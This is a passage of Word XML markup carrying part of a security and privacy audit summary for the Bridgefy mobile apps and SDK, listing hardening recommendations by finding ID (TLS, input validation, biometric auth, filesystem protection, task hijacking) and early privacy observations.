        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>areas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-028</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it may be impossible to determine what happened in the event of a breach. Last</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>but not least, safer mechanisms to authenticate users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>researched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and implemented to limit attacks such as phishing against employees and privilege escalation attacks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-023</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-024</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-025</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The mobile applications and SDK were found to be affected by a number of common misconfigurations. Their security posture will improve substantially with a focus on the following areas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Android and iOS mobile apps were found to fail to take advantage of the security promises of the TLS protocol to protect user communications, hence putting Bridgefy users at risk for man-in-the-middle attacks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). While this issue was promptly fixed during this engagement, it is important to put mechanisms in place to ensure similar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>issues do not occur in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="367" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Input Validation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Android and iOS apps, and by extension the APIs they both use, should reduce the amount of user input available to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eliminate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy spoofing attacks via direct messages (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) and broadcast messages </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-043</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="374" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Biometric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hardening:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) and iOS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-036</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) apps should substantially improve their biometric authentication implementations as they could both be bypassed in multiple ways during this iteration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="371" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Filesystem Protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: The Android and iOS apps will better protect sensitive data at rest, such as PII, credentials, tokens and alternative information by implementing the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-031</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and iOS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-037</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="376" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Information Disclosure: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Android app must implement adequate mechanisms to ensure sensitive information is not leaked via log messages </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="376" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hijacking Attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: The Android application should mitigate well-known Task Hijacking attacks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-032</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="366" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Screenshot Leakage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: The Android app would benefit from implementing a security screen to avoid leaks through screenshots and app backgrounding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-033</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>General Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Other less important hardening recommendations include implementing a root/jailbreak detection mechanism to alert users about security risks prior to using the application (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), a number of settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>be improved to better protect users on older supported devices (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-011</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), improve binary protections (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-013</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), and harden a number of configuration options (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-034</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Regarding the Bridgefy privacy audit, the following positive impressions should be mentioned first:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="60" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7ASecurity was unable to find any evidence of user location tracking or face recognition. However, room for improvement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>area,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>other forms of tracking remain possible due to the storage of messaging metadata in the MongoDB (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="60" w:after="0"/>
        <w:ind w:left="1440" w:right="378" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy does not appear to intentionally weaken cryptography to facilitate third party decryption (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="60" w:after="0"/>
        <w:ind w:left="1440" w:right="377" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
